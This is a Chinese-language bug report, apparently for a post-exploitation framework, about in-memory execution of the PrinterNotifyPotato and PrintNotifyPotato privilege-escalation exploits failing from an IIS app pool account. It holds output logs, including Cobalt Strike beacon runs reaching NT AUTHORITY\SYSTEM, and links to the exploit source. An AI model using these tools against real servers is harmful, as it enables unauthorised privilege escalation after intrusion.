[BUG]内存执行C#可执行EXP有问题

[kokxxoo]

文件 : PrinterNotifyPotato.exe 命令行参数 : whoami 等待时间(秒) : 10 结束进程 : True exe执行完成,输出信息: Exploit for PrinterNotify Service DCOM Object local privalege escalation vulnerability(by SeImpersonatePrivilege abuse). Part of GMH's fuck Tools, Code By zcgonvh.

[+] Current user: IIS APPPOOL\123 [x] CoCreateInstance fail with HRESULT: 0x80070005 ExecuteSharp end

文件 : PrintNotifyPotato.exe 命令行参数 : whoami 等待时间(秒) : 10 结束进程 : True exe执行完成,输出信息: [!] Cannot CoInitializeSecurity hr = -2147417831 [!] Cannot CreateInstance PrintNotify hr = -2147024891 ExecuteSharp end

下面是CS执行的就是正常的 [] Tasked beacon to run .NET program: PrintNotifyPotato.exe whoami [+] host called home, sent: 131864 bytes [+] received output: [] Create PrintNotify Success! [] Create FakeIUnknown Success! [] CreatePointerMoniker Success! [] Trigger...... [] Got Token: 0x49c [] CurrentUser: NT AUTHORITY\SYSTEM [] DuplicateTokenEx Success! PrimaryToken: 0x1162 [*] process start with pid 38374 nt authority\system

[*] Tasked beacon to run .NET program: PrinterNotifyPotato.exe whoami [+] host called home, sent: 119560 bytes [+] received output: Exploit for PrinterNotify Service DCOM Object local privalege escalation vulnerability(by SeImpersonatePrivilege abuse). Part of GMH's fuck Tools, Code By zcgonvh.

[+] Current user: IIS APPPOOL\123 [+] Get Token: 1284 [!] process with pid: 45324 created.

nt authority\system

———————————————————————————————————————— https://github.com/zcgonvh/DCOMPotato/blob/master/PrinterNotifyPotato.cs https://github.com/BeichenDream/PrintNotifyPotato

[FunnyWolf]

exe执行完成,输出信息: [!] Cannot CoInitializeSecurity hr = -2147417831 [] Create PrintNotify Success! [] Create FakeIUnknown Success! [] CreatePointerMoniker Success! [] Trigger...... [] Got Token: 0x6cc [] CurrentUser: NT AUTHORITY\SYSTEM [] DuplicateTokenEx Success! PrimaryToken: 0x1764 [] process start with pid 1632 nt authority\system